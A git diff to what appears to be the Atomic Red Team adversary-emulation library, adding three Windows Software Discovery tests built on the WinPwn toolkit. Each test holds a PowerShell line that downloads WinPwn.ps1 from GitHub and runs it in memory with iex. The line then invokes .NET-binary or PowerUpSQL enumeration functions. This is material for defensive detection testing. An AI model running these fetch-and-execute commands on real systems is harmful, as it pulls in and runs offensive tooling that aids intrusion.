diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 3a31b727..536f5f8f 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -969,6 +969,9 @@ discovery,T1518.001,Security Software Discovery,6,Security Software Discovery -
 discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
 discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
 discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
+discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
+discovery,T1518,Software Discovery,5,WinPwn - DotNet,10ba02d0-ab76-4f80-940d-451633f24c5b,powershell
+discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d6003a95ed34,powershell
 discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
 discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 21570647..c7736822 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -675,6 +675,9 @@ discovery,T1518.001,Security Software Discovery,5,Security Software Discovery -
 discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
 discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
 discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
+discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
+discovery,T1518,Software Discovery,5,WinPwn - DotNet,10ba02d0-ab76-4f80-940d-451633f24c5b,powershell
+discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d6003a95ed34,powershell
 discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
 discovery,T1497.001,System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
 discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 0bd00f6f..440a7ccf 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1503,6 +1503,9 @@
   - Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
   - Atomic Test #2: Applications Installed [windows]
   - Atomic Test #3: Find and Display Safari Browser Version [macos]
+  - Atomic Test #4: WinPwn - Dotnetsearch [windows]
+  - Atomic Test #5: WinPwn - DotNet [windows]
+  - Atomic Test #6: WinPwn - powerSQL [windows]
 - [T1497.001 System Checks](../../T1497.001/T1497.001.md)
   - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
   - Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 6d0b5c4d..09398503 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1086,6 +1086,9 @@
 - [T1518 Software Discovery](../../T1518/T1518.md)
   - Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
   - Atomic Test #2: Applications Installed [windows]
+  - Atomic Test #4: WinPwn - Dotnetsearch [windows]
+  - Atomic Test #5: WinPwn - DotNet [windows]
+  - Atomic Test #6: WinPwn - powerSQL [windows]
 - [T1497.001 System Checks](../../T1497.001/T1497.001.md)
   - Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
   - Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index ea2da349..e8192279 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -61901,9 +61901,44 @@ discovery:
       executor:
         name: sh
         elevation_required: false
-        command: |-
+        command: |
           /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
           /usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
+    - name: WinPwn - Dotnetsearch
+      auto_generated_guid: 7e79a1b6-519e-433c-ad55-3ff293667101
+      description: Search for any .NET binary file in a share using the Dotnetsearch
+        function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          Dotnetsearch -noninteractive -consoleoutput
+        name: powershell
+    - name: WinPwn - DotNet
+      auto_generated_guid: 10ba02d0-ab76-4f80-940d-451633f24c5b
+      description: Search for .NET Service-Binaries on this system via winpwn dotnet
+        function of WinPwn.
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          dotnet -consoleoutput -noninteractive
+        name: powershell
+    - name: WinPwn - powerSQL
+      auto_generated_guid: 0bb64470-582a-4155-bde2-d6003a95ed34
+      description: Start PowerUpSQL Checks using powerSQL function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          powerSQL -noninteractive -consoleoutput
+        name: powershell
   T1497.001:
     technique:
       type: attack-pattern
diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md
index 796e4ffc..7cf1c0d1 100644
--- a/atomics/T1518/T1518.md
+++ b/atomics/T1518/T1518.md
@@ -12,6 +12,12 @@ Adversaries may attempt to enumerate software for a variety of reasons, such as
 
 - [Atomic Test #3 - Find and Display Safari Browser Version](#atomic-test-3---find-and-display-safari-browser-version)
 
+- [Atomic Test #4 - WinPwn - Dotnetsearch](#atomic-test-4---winpwn---dotnetsearch)
+
+- [Atomic Test #5 - WinPwn - DotNet](#atomic-test-5---winpwn---dotnet)
+
+- [Atomic Test #6 - WinPwn - powerSQL](#atomic-test-6---winpwn---powersql)
+
 
 <br/>
 
@@ -100,4 +106,94 @@ Adversaries may attempt to get a listing of non-security related software that i
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - WinPwn - Dotnetsearch
+Search for any .NET binary file in a share using the Dotnetsearch function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7e79a1b6-519e-433c-ad55-3ff293667101
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+Dotnetsearch -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - WinPwn - DotNet
+Search for .NET Service-Binaries on this system via winpwn dotnet function of WinPwn.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 10ba02d0-ab76-4f80-940d-451633f24c5b
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+dotnet -consoleoutput -noninteractive
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - WinPwn - powerSQL
+Start PowerUpSQL Checks using powerSQL function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0bb64470-582a-4155-bde2-d6003a95ed34
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+powerSQL -noninteractive -consoleoutput
+```
+
+
+
+
+
+
 <br/>